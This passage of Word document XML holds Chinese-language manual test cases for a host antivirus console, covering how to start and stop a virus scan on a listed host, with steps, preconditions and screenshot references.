                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1B11091B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc36487981"/>
      <w:r w:rsidRPr="00536672">
        <w:t>开始</w:t>
      </w:r>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>扫描主机病毒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="39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31A7BDD0" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="779703E8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="777DD6D6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>开始</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>扫描主机病毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="7581F425" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B29A7F6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="581D4236" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>对列表中的主机进行病毒扫描。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="2DB35426" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15802A2D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70DEC834" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="489B05DC" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53B006F3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23078D9E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73D0AB1B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>点击列表中一个主机的“查杀操作”中的开始按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="27411A4E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>或者点击主机“详细信息”进入详情页面，点击“开始扫描按钮”。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="079AE09B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6247FFAD" wp14:editId="7F288A6D">
                  <wp:extent cx="4104005" cy="1583690"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="16510"/>
                  <wp:docPr id="553" name="图片 553" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488128(1).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4104005" cy="1583690"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BA74B9C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51537E18" wp14:editId="0B193A5C">
                  <wp:extent cx="4104005" cy="1977390"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="3810"/>
                  <wp:docPr id="554" name="图片 554" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488152(1).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4104005" cy="1977390"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C0C8D71" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4866FFF3" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7E3CB2A4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="799E4917" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>成功开始扫描某个主机的病毒</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="501E49FE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3275EC36" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>测试结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70F3B2C6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="35097D0D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="395" w:name="_Toc36487982"/>
      <w:r w:rsidRPr="00536672">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>终止扫描主机病毒</w:t>
      </w:r>
      <w:bookmarkEnd w:id="395"/>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833"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="148454E2" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480F2527"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标题</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0811234F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>终止扫描主机病毒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="472B0ECE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33B92B02" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>目标</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61B3BB73" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>手工测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4C645E43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E3E17B" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预设条件</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="164E1410" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>系统检测功能相关组件全部开启，病毒库更新到最新</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="5BA78431" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="41810FE0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F4ACE8F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进入系统检测页面；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43E2F0AE" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>找到列表中一个正在查杀的主机；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74382DE8" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>点击其列表项中“查杀操作”中的终止按钮；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A46104C"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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61E09484" wp14:editId="7FAE7586">
                  <wp:extent cx="4104005" cy="1510665"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="13335"/>
                  <wp:docPr id="555" name="图片 555" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488423(1).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4104005" cy="1510665"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="5CEC068E" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或者点击此主机“详细信息”进入详情页面，点击“终止扫描”。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65C45258" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-c"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:noProof/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62DF9342" wp14:editId="3621354D">
                  <wp:extent cx="4104005" cy="2047240"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="10160"/>
                  <wp:docPr id="556" name="图片 556" descr="C:\Users\PC-2\AppData\Local\Temp\1529488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PC-2\AppData\Local\Temp\1529488448(1).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4104005" cy="2047240"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="3797F53A" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="480"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6F17BA43" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="448728A3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102ED115" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="11"/>
              <w:ind w:left="360" w:firstLineChars="0" w:firstLine="0"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑"/>
